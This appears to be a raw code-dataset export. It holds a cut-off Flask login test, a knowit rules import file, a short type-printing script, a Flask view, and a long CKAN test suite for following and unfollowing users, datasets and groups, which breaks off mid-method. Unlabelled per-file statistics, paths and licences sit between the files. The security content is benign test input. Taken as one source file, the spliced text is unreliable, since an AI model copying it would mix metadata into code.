self.headers = {'X-API-KEY':'{}'.format(token)}
def tearDown(self):
self.test = None
self.content_type = None
def test_login(self):
payload = {'role': 'admin', 'password': '1234', 'email': 'admin@gmail.com'}
response = self.test.post('/api/v1/users/login',content_type=self.content_type,
data=json.dumps(payload))
data =json.loads(response.get_data().decode('UTF-8'))
self.assertEqual(response.status_code,200)
def test_register_employee(self):
payload = {'role': 'admin', 'last_name': 'string', 'password': '1234', 'email': 'string@gmail.com',
'first_name': 'string'}
response = self.test.post('/api/v1/users/register',content_type=self.content_type,
data=json.dumps(payload),headers=self.headers)
data =json.loads(response.get_data().decode('UTF-8'))
self.assertEqual(response.status_code,200)
if __name__ == '__main__':
unittest.main()
| 37.666667
| 101
| 0.712021
| 375
| 2,712
| 5.013333
| 0.178667
| 0.093617
| 0.079787
| 0.06383
| 0.804255
| 0.804255
| 0.755319
| 0.717553
| 0.717553
| 0.693085
| 0
| 0.019365
| 0.105089
| 2,712
| 72
| 102
| 37.666667
| 0.755253
| 0
| 0
| 0.59322
| 0
| 0
| 0.211205
| 0.008109
| 0
| 0
| 0
| 0
| 0.135593
| 1
| 0.152542
| false
| 0.118644
| 0.050847
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
90a943a8f323d5690c9e80436b17fac13104d0c4
| 330
|
py
|
Python
|
knowit/rules/__init__.py
|
ratoaq2/knowit
|
e7cc0d786fafdb9dba99b95a1cc95c02f84f0b5b
|
[
"MIT"
] | 21
|
2016-10-15T13:49:16.000Z
|
2021-06-14T14:42:57.000Z
|
knowit/rules/__init__.py
|
ratoaq2/knowit
|
e7cc0d786fafdb9dba99b95a1cc95c02f84f0b5b
|
[
"MIT"
] | 35
|
2016-11-18T17:08:38.000Z
|
2021-11-26T09:36:35.000Z
|
knowit/rules/__init__.py
|
ratoaq2/knowit
|
e7cc0d786fafdb9dba99b95a1cc95c02f84f0b5b
|
[
"MIT"
] | 5
|
2016-11-23T23:39:52.000Z
|
2021-02-27T19:18:27.000Z
|
from knowit.rules.audio import AtmosRule
from knowit.rules.audio import AudioChannelsRule
from knowit.rules.audio import DtsHdRule
from knowit.rules.general import LanguageRule
from knowit.rules.subtitle import ClosedCaptionRule
from knowit.rules.subtitle import HearingImpairedRule
from knowit.rules.video import ResolutionRule
| 36.666667
| 53
| 0.869697
| 42
| 330
| 6.833333
| 0.357143
| 0.243902
| 0.365854
| 0.209059
| 0.473868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087879
| 330
| 8
| 54
| 41.25
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90b232963c4041540fbe309af85a587634a392a0
| 135
|
py
|
Python
|
zero/what_is_oop.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
zero/what_is_oop.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
zero/what_is_oop.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
print((type(None)))
print(type(True))
print(type(5))
print(type(5.5))
print(type('hi'))
print(type([]))
print(type(()))
print(type({}))
| 16.875
| 19
| 0.62963
| 22
| 135
| 3.863636
| 0.272727
| 0.847059
| 0.235294
| 0.423529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023438
| 0.051852
| 135
| 8
| 20
| 16.875
| 0.640625
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
90b7b6dac2ac0e3ec63808875956c62c12b09e2e
| 187
|
py
|
Python
|
zip/app/views.py
|
kdheepak/zip
|
5c7f2400045d6ae2b3b4994577c73209562604a9
|
[
"BSD-3-Clause"
] | null | null | null |
zip/app/views.py
|
kdheepak/zip
|
5c7f2400045d6ae2b3b4994577c73209562604a9
|
[
"BSD-3-Clause"
] | 2
|
2018-08-14T20:52:43.000Z
|
2020-11-18T11:26:48.000Z
|
zip/app/views.py
|
kdheepak/zip
|
5c7f2400045d6ae2b3b4994577c73209562604a9
|
[
"BSD-3-Clause"
] | 2
|
2018-04-17T08:39:23.000Z
|
2019-02-05T07:43:00.000Z
|
# -*- encoding: utf-8 -*-
from flask import url_for, redirect, render_template, flash, g, session
from app import app
@app.route('/')
def index():
return render_template('index.html')
| 20.777778
| 71
| 0.705882
| 27
| 187
| 4.777778
| 0.740741
| 0.217054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 0.139037
| 187
| 8
| 72
| 23.375
| 0.795031
| 0.122995
| 0
| 0
| 0
| 0
| 0.067901
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
90bc4a23101028d1eba113429d147698ebdc7c6d
| 43,903
|
py
|
Python
|
ckan/tests/functional/api/test_follow.py
|
gcba/ckan
|
f4508f2999d5f69281ac8003ba7f42df5930b6fd
|
[
"Apache-2.0"
] | null | null | null |
ckan/tests/functional/api/test_follow.py
|
gcba/ckan
|
f4508f2999d5f69281ac8003ba7f42df5930b6fd
|
[
"Apache-2.0"
] | null | null | null |
ckan/tests/functional/api/test_follow.py
|
gcba/ckan
|
f4508f2999d5f69281ac8003ba7f42df5930b6fd
|
[
"Apache-2.0"
] | 1
|
2020-10-30T02:19:02.000Z
|
2020-10-30T02:19:02.000Z
|
'''Test for the follower API.
This module tests following, unfollowing, getting a list of what you're
following or the number of things you're following, getting a list of who's
following you or the number of followers you have, testing whether or not
you're following something, etc.
This module _does not_ test the user dashboard activity stream (which shows
activities from everything you're following), that is tested in
test_dashboard.py.
'''
import datetime
import paste
import pylons.test
import ckan
from ckan.tests import are_foreign_keys_supported, SkipTest
import ckan.tests
def datetime_from_string(s):
'''Return a standard datetime.datetime object initialised from a string in
the same format used for timestamps in dictized activities (the format
produced by datetime.datetime.isoformat())
'''
return datetime.datetime.strptime(s, '%Y-%m-%dT%H:%M:%S.%f')
def follow_user(app, follower_id, apikey, object_id, object_arg):
'''Test a user starting to follow another user via the API.
:param follower_id: id of the user that will be following something.
:param apikey: API key of the user that will be following something.
:param object_id: id of the user that will be followed.
:param object_arg: the argument to pass to follow_user as the id of
the object that will be followed, could be the object's id or name.
'''
# Record the object's followers count before.
follower_count_before = ckan.tests.call_action_api(app,
'user_follower_count', id=object_id)
# Record the follower's followees count before.
followee_count_before = ckan.tests.call_action_api(app,
'user_followee_count', id=follower_id)
# Check that the user is not already following the object.
result = ckan.tests.call_action_api(app, 'am_following_user',
id=object_id, apikey=apikey)
assert result is False
# Make the user start following the object.
before = datetime.datetime.now()
follower = ckan.tests.call_action_api(app, 'follow_user', id=object_arg,
apikey=apikey)
after = datetime.datetime.now()
assert follower['follower_id'] == follower_id
assert follower['object_id'] == object_id
timestamp = datetime_from_string(follower['datetime'])
assert (timestamp >= before and timestamp <= after), str(timestamp)
# Check that am_following_user now returns True.
result = ckan.tests.call_action_api(app, 'am_following_user',
id=object_id, apikey=apikey)
assert result is True
# Check that the follower appears in the object's list of followers.
followers = ckan.tests.call_action_api(app, 'user_follower_list',
id=object_id)
assert len(followers) == follower_count_before + 1
assert len([follower for follower in followers if follower['id'] == follower_id]) == 1
# Check that the object appears in the follower's list of followees.
followees = ckan.tests.call_action_api(app, 'user_followee_list',
id=follower_id)
assert len(followees) == followee_count_before + 1
assert len([followee for followee in followees if followee['id'] == object_id]) == 1
# Check that the object's follower count has increased by 1.
follower_count_after = ckan.tests.call_action_api(app,
'user_follower_count', id=object_id)
assert follower_count_after == follower_count_before + 1
# Check that the follower's followee count has increased by 1.
followee_count_after = ckan.tests.call_action_api(app,
'user_followee_count', id=follower_id)
assert followee_count_after == followee_count_before + 1
def follow_dataset(app, follower_id, apikey, dataset_id, dataset_arg):
'''Test a user starting to follow a dataset via the API.
:param follower_id: id of the user.
:param apikey: API key of the user.
:param dataset_id: id of the dataset.
:param dataset_arg: the argument to pass to follow_dataset as the id of
the dataset that will be followed, could be the dataset's id or name.
'''
# Record the dataset's followers count before.
follower_count_before = ckan.tests.call_action_api(app,
'dataset_follower_count', id=dataset_id)
# Record the follower's followees count before.
followee_count_before = ckan.tests.call_action_api(app,
'dataset_followee_count', id=follower_id)
# Check that the user is not already following the dataset.
result = ckan.tests.call_action_api(app, 'am_following_dataset',
id=dataset_id, apikey=apikey)
assert result is False
# Make the user start following the dataset.
before = datetime.datetime.now()
follower = ckan.tests.call_action_api(app, 'follow_dataset',
id=dataset_arg, apikey=apikey)
after = datetime.datetime.now()
assert follower['follower_id'] == follower_id
assert follower['object_id'] == dataset_id
timestamp = datetime_from_string(follower['datetime'])
assert (timestamp >= before and timestamp <= after), str(timestamp)
# Check that am_following_dataset now returns True.
result = ckan.tests.call_action_api(app, 'am_following_dataset',
id=dataset_id, apikey=apikey)
assert result is True
# Check that the follower appears in the dataset's list of followers.
followers = ckan.tests.call_action_api(app, 'dataset_follower_list',
id=dataset_id)
assert len(followers) == follower_count_before + 1
assert len([follower for follower in followers if follower['id'] == follower_id]) == 1
# Check that the dataset appears in the follower's list of followees.
followees = ckan.tests.call_action_api(app, 'dataset_followee_list',
id=follower_id)
assert len(followees) == followee_count_before + 1
assert len([followee for followee in followees if followee['id'] == dataset_id]) == 1
# Check that the dataset's follower count has increased by 1.
follower_count_after = ckan.tests.call_action_api(app,
'dataset_follower_count', id=dataset_id)
assert follower_count_after == follower_count_before + 1
# Check that the follower's followee count has increased by 1.
followee_count_after = ckan.tests.call_action_api(app,
'dataset_followee_count', id=follower_id)
assert followee_count_after == followee_count_before + 1
def follow_group(app, user_id, apikey, group_id, group_arg):
'''Test a user starting to follow a group via the API.
:param user_id: id of the user
:param apikey: API key of the user
:param group_id: id of the group
:param group_arg: the argument to pass to follow_group as the id of
the group that will be followed, could be the group's id or name
'''
# Record the group's followers count before.
follower_count_before = ckan.tests.call_action_api(app,
'group_follower_count', id=group_id)
# Record the user's followees count before.
followee_count_before = ckan.tests.call_action_api(app,
'group_followee_count', id=user_id)
# Check that the user is not already following the group.
result = ckan.tests.call_action_api(app, 'am_following_group',
id=group_id, apikey=apikey)
assert result is False
# Make the user start following the group.
before = datetime.datetime.now()
follower = ckan.tests.call_action_api(app, 'follow_group', id=group_id,
apikey=apikey)
after = datetime.datetime.now()
assert follower['follower_id'] == user_id
assert follower['object_id'] == group_id
timestamp = datetime_from_string(follower['datetime'])
assert (timestamp >= before and timestamp <= after), str(timestamp)
# Check that am_following_group now returns True.
result = ckan.tests.call_action_api(app, 'am_following_group',
id=group_id, apikey=apikey)
assert result is True
# Check that the user appears in the group's list of followers.
followers = ckan.tests.call_action_api(app, 'group_follower_list',
id=group_id)
assert len(followers) == follower_count_before + 1
assert len([follower for follower in followers
if follower['id'] == user_id]) == 1
# Check that the group appears in the user's list of followees.
followees = ckan.tests.call_action_api(app, 'group_followee_list',
id=user_id)
assert len(followees) == followee_count_before + 1
assert len([followee for followee in followees
if followee['id'] == group_id]) == 1
# Check that the group's follower count has increased by 1.
follower_count_after = ckan.tests.call_action_api(app,
'group_follower_count', id=group_id)
assert follower_count_after == follower_count_before + 1
# Check that the user's followee count has increased by 1.
followee_count_after = ckan.tests.call_action_api(app,
'group_followee_count', id=user_id)
assert followee_count_after == followee_count_before + 1
class TestFollow(object):
'''Tests for the follower API.'''
@classmethod
def setup_class(self):
ckan.tests.CreateTestData.create()
self.testsysadmin = {
'id': ckan.model.User.get('testsysadmin').id,
'apikey': ckan.model.User.get('testsysadmin').apikey,
'name': ckan.model.User.get('testsysadmin').name,
}
self.annafan = {
'id': ckan.model.User.get('annafan').id,
'apikey': ckan.model.User.get('annafan').apikey,
'name': ckan.model.User.get('annafan').name,
}
self.russianfan = {
'id': ckan.model.User.get('russianfan').id,
'apikey': ckan.model.User.get('russianfan').apikey,
'name': ckan.model.User.get('russianfan').name,
}
self.joeadmin = {
'id': ckan.model.User.get('joeadmin').id,
'apikey': ckan.model.User.get('joeadmin').apikey,
'name': ckan.model.User.get('joeadmin').name,
}
self.warandpeace = {
'id': ckan.model.Package.get('warandpeace').id,
'name': ckan.model.Package.get('warandpeace').name,
}
self.annakarenina = {
'id': ckan.model.Package.get('annakarenina').id,
'name': ckan.model.Package.get('annakarenina').name,
}
self.rogers_group = {
'id': ckan.model.Group.get('roger').id,
'name': ckan.model.Group.get('roger').name,
}
self.davids_group = {
'id': ckan.model.Group.get('david').id,
'name': ckan.model.Group.get('david').name,
}
self.app = paste.fixture.TestApp(pylons.test.pylonsapp)
@classmethod
def teardown_class(self):
ckan.model.repo.rebuild_db()
def test_01_user_follow_user_bad_apikey(self):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
error = ckan.tests.call_action_api(self.app, 'follow_user',
id=self.russianfan['id'], apikey=apikey,
status=403)
assert error['message'] == 'Access denied'
def test_01_user_follow_dataset_bad_apikey(self):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
error = ckan.tests.call_action_api(self.app, 'follow_dataset',
id=self.warandpeace['id'], apikey=apikey,
status=403)
assert error['message'] == 'Access denied'
def test_01_user_follow_group_bad_apikey(self):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
error = ckan.tests.call_action_api(self.app, 'follow_group',
id=self.rogers_group['id'], apikey=apikey,
status=403)
assert error['message'] == 'Access denied'
def test_01_user_follow_user_missing_apikey(self):
error = ckan.tests.call_action_api(self.app, 'follow_user',
id=self.russianfan['id'], status=403)
assert error['message'] == 'Access denied'
def test_01_user_follow_dataset_missing_apikey(self):
error = ckan.tests.call_action_api(self.app, 'follow_dataset',
id=self.warandpeace['id'], status=403)
assert error['message'] == 'Access denied'
def test_01_user_follow_group_missing_apikey(self):
error = ckan.tests.call_action_api(self.app, 'follow_group',
id=self.rogers_group['id'], status=403)
assert error['message'] == 'Access denied'
def test_01_follow_bad_object_id(self):
for action in ('follow_user', 'follow_dataset', 'follow_group'):
for object_id in ('bad id', ' ', 3, 35.7, 'xxx'):
error = ckan.tests.call_action_api(self.app, action,
id=object_id,
apikey=self.annafan['apikey'], status=409)
assert error['id'][0].startswith('Not found')
def test_01_follow_empty_object_id(self):
for action in ('follow_user', 'follow_dataset', 'follow_group'):
for object_id in ('', None):
error = ckan.tests.call_action_api(self.app, action,
id=object_id,
apikey=self.annafan['apikey'], status=409)
assert error['id'] == ['Missing value']
def test_01_follow_missing_object_id(self):
for action in ('follow_user', 'follow_dataset', 'follow_group'):
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409)
assert error['id'] == ['Missing value']
def test_02_user_follow_user_by_id(self):
follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
self.russianfan['id'], self.russianfan['id'])
def test_02_user_follow_dataset_by_id(self):
follow_dataset(self.app, self.annafan['id'], self.annafan['apikey'],
self.warandpeace['id'], self.warandpeace['id'])
def test_02_user_follow_group_by_id(self):
follow_group(self.app, self.annafan['id'], self.annafan['apikey'],
self.rogers_group['id'], self.rogers_group['id'])
def test_02_user_follow_user_by_name(self):
follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
self.testsysadmin['id'], self.testsysadmin['name'])
def test_02_user_follow_dataset_by_name(self):
follow_dataset(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
self.warandpeace['id'], self.warandpeace['name'])
def test_02_user_follow_group_by_name(self):
follow_group(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
self.rogers_group['id'], self.rogers_group['name'])
def test_03_user_follow_user_already_following(self):
for object_id in (self.russianfan['id'], self.russianfan['name'],
self.testsysadmin['id'], self.testsysadmin['name']):
error = ckan.tests.call_action_api(self.app, 'follow_user',
id=object_id, apikey=self.annafan['apikey'],
status=409)
assert error['message'].startswith('You are already following ')
def test_03_user_follow_dataset_already_following(self):
for object_id in (self.warandpeace['id'], self.warandpeace['name']):
error = ckan.tests.call_action_api(self.app, 'follow_dataset',
id=object_id, apikey=self.annafan['apikey'],
status=409)
assert error['message'].startswith('You are already following ')
def test_03_user_follow_group_already_following(self):
for group_id in (self.rogers_group['id'], self.rogers_group['name']):
error = ckan.tests.call_action_api(self.app, 'follow_group',
id=group_id, apikey=self.annafan['apikey'],
status=409)
assert error['message'].startswith('You are already following ')
def test_03_user_cannot_follow_herself(self):
error = ckan.tests.call_action_api(self.app, 'follow_user',
apikey=self.annafan['apikey'], status=409,
id=self.annafan['id'])
assert error['message'] == 'You cannot follow yourself'
def test_04_follower_count_bad_id(self):
for action in ('user_follower_count', 'dataset_follower_count',
'group_follower_count'):
for object_id in ('bad id', ' ', 3, 35.7, 'xxx', ''):
error = ckan.tests.call_action_api(self.app, action,
status=409, id=object_id)
assert 'id' in error
def test_04_follower_count_missing_id(self):
for action in ('user_follower_count', 'dataset_follower_count',
'group_follower_count'):
error = ckan.tests.call_action_api(self.app, action, status=409)
assert error['id'] == ['Missing value']
def test_04_user_follower_count_no_followers(self):
follower_count = ckan.tests.call_action_api(self.app,
'user_follower_count', id=self.annafan['id'])
assert follower_count == 0
def test_04_dataset_follower_count_no_followers(self):
follower_count = ckan.tests.call_action_api(self.app,
'dataset_follower_count', id=self.annakarenina['id'])
assert follower_count == 0
def test_04_group_follower_count_no_followers(self):
follower_count = ckan.tests.call_action_api(self.app,
'group_follower_count', id=self.davids_group['id'])
assert follower_count == 0
def test_04_follower_list_bad_id(self):
for action in ('user_follower_list', 'dataset_follower_list',
'group_follower_list'):
for object_id in ('bad id', ' ', 3, 35.7, 'xxx', ''):
error = ckan.tests.call_action_api(self.app, action,
status=409, id=object_id)
assert error['id']
def test_04_follower_list_missing_id(self):
for action in ('user_follower_list', 'dataset_follower_list',
'group_follower_list'):
error = ckan.tests.call_action_api(self.app, action, status=409)
assert error['id'] == ['Missing value']
def test_04_user_follower_list_no_followers(self):
followers = ckan.tests.call_action_api(self.app, 'user_follower_list',
id=self.annafan['id'])
assert followers == []
def test_04_dataset_follower_list_no_followers(self):
followers = ckan.tests.call_action_api(self.app,
'dataset_follower_list', id=self.annakarenina['id'])
assert followers == []
def test_04_group_follower_list_no_followers(self):
followers = ckan.tests.call_action_api(self.app, 'group_follower_list',
id=self.davids_group['id'])
assert followers == []
def test_04_am_following_bad_id(self):
for action in ('am_following_dataset', 'am_following_user',
'am_following_group'):
for object_id in ('bad id', ' ', 3, 35.7, 'xxx'):
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409, id=object_id)
assert error['id'][0].startswith('Not found: ')
def test_04_am_following_missing_id(self):
for action in ('am_following_dataset', 'am_following_user',
'am_following_group'):
for id in ('missing', None, ''):
if id == 'missing':
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409)
else:
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409, id=id)
assert error['id'] == [u'Missing value']
def test_04_am_following_dataset_bad_apikey(self):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
error = ckan.tests.call_action_api(self.app,
'am_following_dataset', apikey=apikey, status=403,
id=self.warandpeace['id'])
assert error['message'] == 'Access denied'
def test_04_am_following_dataset_missing_apikey(self):
error = ckan.tests.call_action_api(self.app, 'am_following_dataset',
status=403, id=self.warandpeace['id'])
assert error['message'] == 'Access denied'
def test_04_am_following_user_bad_apikey(self):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
error = ckan.tests.call_action_api(self.app, 'am_following_user',
apikey=apikey, status=403, id=self.annafan['id'])
assert error['message'] == 'Access denied'
def test_04_am_following_user_missing_apikey(self):
error = ckan.tests.call_action_api(self.app, 'am_following_user',
status=403, id=self.annafan['id'])
assert error['message'] == 'Access denied'
def test_04_am_following_group_bad_apikey(self):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
error = ckan.tests.call_action_api(self.app, 'am_following_group',
apikey=apikey, status=403, id=self.rogers_group['id'])
assert error['message'] == 'Access denied'
def test_04_am_following_group_missing_apikey(self):
error = ckan.tests.call_action_api(self.app, 'am_following_group',
status=403, id=self.rogers_group['id'])
assert error['message'] == 'Access denied'
class TestFollowerDelete(object):
'''Tests for the unfollow_* APIs.'''
@classmethod
def setup_class(self):
ckan.tests.CreateTestData.create()
self.tester = {
'id': ckan.model.User.get('tester').id,
'apikey': ckan.model.User.get('tester').apikey,
'name': ckan.model.User.get('tester').name,
}
self.testsysadmin = {
'id': ckan.model.User.get('testsysadmin').id,
'apikey': ckan.model.User.get('testsysadmin').apikey,
'name': ckan.model.User.get('testsysadmin').name,
}
self.annafan = {
'id': ckan.model.User.get('annafan').id,
'apikey': ckan.model.User.get('annafan').apikey,
'name': ckan.model.User.get('annafan').name,
}
self.russianfan = {
'id': ckan.model.User.get('russianfan').id,
'apikey': ckan.model.User.get('russianfan').apikey,
'name': ckan.model.User.get('russianfan').name,
}
self.joeadmin = {
'id': ckan.model.User.get('joeadmin').id,
'apikey': ckan.model.User.get('joeadmin').apikey,
'name': ckan.model.User.get('joeadmin').name,
}
self.warandpeace = {
'id': ckan.model.Package.get('warandpeace').id,
'name': ckan.model.Package.get('warandpeace').name,
}
self.annakarenina = {
'id': ckan.model.Package.get('annakarenina').id,
'name': ckan.model.Package.get('annakarenina').name,
}
self.rogers_group = {
'id': ckan.model.Group.get('roger').id,
'name': ckan.model.Group.get('roger').name,
}
self.davids_group = {
'id': ckan.model.Group.get('david').id,
'name': ckan.model.Group.get('david').name,
}
self.app = paste.fixture.TestApp(pylons.test.pylonsapp)
follow_user(self.app, self.testsysadmin['id'],
self.testsysadmin['apikey'], self.joeadmin['id'],
self.joeadmin['id'])
follow_user(self.app, self.tester['id'], self.tester['apikey'],
self.joeadmin['id'], self.joeadmin['id'])
follow_user(self.app, self.russianfan['id'], self.russianfan['apikey'],
self.joeadmin['id'], self.joeadmin['id'])
follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
self.joeadmin['id'], self.joeadmin['id'])
follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
self.tester['id'], self.tester['id'])
follow_dataset(self.app, self.testsysadmin['id'],
self.testsysadmin['apikey'], self.warandpeace['id'],
self.warandpeace['id'])
follow_dataset(self.app, self.tester['id'], self.tester['apikey'],
self.warandpeace['id'], self.warandpeace['id'])
follow_dataset(self.app, self.russianfan['id'], self.russianfan['apikey'],
self.warandpeace['id'], self.warandpeace['id'])
follow_dataset(self.app, self.annafan['id'], self.annafan['apikey'],
self.warandpeace['id'], self.warandpeace['id'])
follow_group(self.app, self.annafan['id'], self.annafan['apikey'],
self.davids_group['id'], self.davids_group['id'])
@classmethod
def teardown_class(self):
ckan.model.repo.rebuild_db()
def test_01_unfollow_user_not_exists(self):
'''Test the error response when a user tries to unfollow a user that
she is not following.
'''
error = ckan.tests.call_action_api(self.app, 'unfollow_user',
apikey=self.annafan['apikey'], status=404,
id=self.russianfan['id'])
assert error['message'].startswith('Not found: You are not following ')
def test_01_unfollow_dataset_not_exists(self):
'''Test the error response when a user tries to unfollow a dataset that
she is not following.
'''
error = ckan.tests.call_action_api(self.app, 'unfollow_dataset',
apikey=self.annafan['apikey'], status=404,
id=self.annakarenina['id'])
assert error['message'].startswith('Not found: You are not following')
def test_01_unfollow_group_not_exists(self):
'''Test the error response when a user tries to unfollow a group that
she is not following.
'''
error = ckan.tests.call_action_api(self.app, 'unfollow_group',
apikey=self.annafan['apikey'], status=404,
id=self.rogers_group['id'])
assert error['message'].startswith('Not found: You are not following')
def test_01_unfollow_bad_apikey(self):
'''Test the error response when a user tries to unfollow something
but provides a bad API key.
'''
for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
for apikey in ('bad api key', '', ' ', 'None', '3', '35.7',
'xxx'):
error = ckan.tests.call_action_api(self.app, action,
apikey=apikey, status=403, id=self.joeadmin['id'])
assert error['message'] == 'Access denied'
def test_01_unfollow_missing_apikey(self):
'''Test error response when calling unfollow_* without api key.'''
for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
error = ckan.tests.call_action_api(self.app, action, status=403,
id=self.joeadmin['id'])
assert error['message'] == 'Access denied'
def test_01_unfollow_bad_object_id(self):
'''Test error response when calling unfollow_* with bad object id.'''
for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
for object_id in ('bad id', ' ', 3, 35.7, 'xxx'):
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409,
id=object_id)
assert error['id'][0].startswith('Not found')
def test_01_unfollow_missing_object_id(self):
for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
for id in ('missing', None, ''):
if id == 'missing':
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409)
else:
error = ckan.tests.call_action_api(self.app, action,
apikey=self.annafan['apikey'], status=409, id=id)
assert error['id'] == [u'Missing value']
def _unfollow_user(self, follower_id, apikey, object_id, object_arg):
'''Test a user unfollowing a user via the API.
:param follower_id: id of the follower.
:param apikey: API key of the follower.
:param object_id: id of the object to unfollow.
:param object_arg: the argument to pass to unfollow_user as the id of
the object to unfollow, could be the object's id or name.
'''
# Record the user's number of followers before.
count_before = ckan.tests.call_action_api(self.app,
'user_follower_count', id=object_id)
# Check that the user is following the object.
am_following = ckan.tests.call_action_api(self.app,
'am_following_user', apikey=apikey, id=object_id)
assert am_following is True
# Make the user unfollow the object.
ckan.tests.call_action_api(self.app, 'unfollow_user', apikey=apikey,
id=object_arg)
# Check that am_following_user now returns False.
am_following = ckan.tests.call_action_api(self.app,
'am_following_user', apikey=apikey, id=object_id)
assert am_following is False
# Check that the user doesn't appear in the object's list of followers.
followers = ckan.tests.call_action_api(self.app, 'user_follower_list',
id=object_id)
assert len([follower for follower in followers if follower['id'] ==
follower_id]) == 0
# Check that the object's follower count has decreased by 1.
count_after = ckan.tests.call_action_api(self.app,
'user_follower_count', id=object_id)
assert count_after == count_before - 1
def _unfollow_dataset(self, user_id, apikey, dataset_id, dataset_arg):
'''Test a user unfollowing a dataset via the API.
:param user_id: id of the follower.
:param apikey: API key of the follower.
:param dataset_id: id of the object to unfollow.
:param dataset_arg: the argument to pass to unfollow_dataset as the id
of the object to unfollow, could be the object's id or name.
'''
# Record the dataset's number of followers before.
count_before = ckan.tests.call_action_api(self.app,
'dataset_follower_count', id=dataset_id)
# Check that the user is following the dataset.
am_following = ckan.tests.call_action_api(self.app,
'am_following_dataset', apikey=apikey, id=dataset_id)
assert am_following is True
# Make the user unfollow the dataset.
ckan.tests.call_action_api(self.app, 'unfollow_dataset', apikey=apikey,
id=dataset_arg)
# Check that am_following_dataset now returns False.
am_following = ckan.tests.call_action_api(self.app,
'am_following_dataset', apikey=apikey, id=dataset_id)
assert am_following is False
# Check that the user doesn't appear in the dataset's list of
# followers.
followers = ckan.tests.call_action_api(self.app,
'dataset_follower_list', id=dataset_id)
assert len([follower for follower in followers if follower['id'] ==
user_id]) == 0
# Check that the dataset's follower count has decreased by 1.
count_after = ckan.tests.call_action_api(self.app,
'dataset_follower_count', id=dataset_id)
assert count_after == count_before - 1
def _unfollow_group(self, user_id, apikey, group_id, group_arg):
'''Test a user unfollowing a group via the API.
:param user_id: id of the user
:param apikey: API key of the user
:param group_id: id of the group
:param group_arg: the argument to pass to unfollow_group as the id
of the group, could be the group's id or name.
'''
# Record the group's number of followers before.
count_before = ckan.tests.call_action_api(self.app,
'group_follower_count', id=group_id)
# Check that the user is following the group.
am_following = ckan.tests.call_action_api(self.app,
'am_following_group', apikey=apikey, id=group_id)
assert am_following is True
# Make the user unfollow the group.
ckan.tests.call_action_api(self.app, 'unfollow_group', apikey=apikey,
id=group_arg)
# Check that am_following_group now returns False.
am_following = ckan.tests.call_action_api(self.app,
'am_following_group', apikey=apikey, id=group_id)
assert am_following is False
# Check that the user doesn't appear in the group's list of
# followers.
followers = ckan.tests.call_action_api(self.app, 'group_follower_list',
id=group_id)
assert len([follower for follower in followers if follower['id'] ==
user_id]) == 0
# Check that the group's follower count has decreased by 1.
count_after = ckan.tests.call_action_api(self.app,
'group_follower_count', id=group_id)
assert count_after == count_before - 1
def test_02_follower_delete_by_id(self):
self._unfollow_user(self.annafan['id'], self.annafan['apikey'],
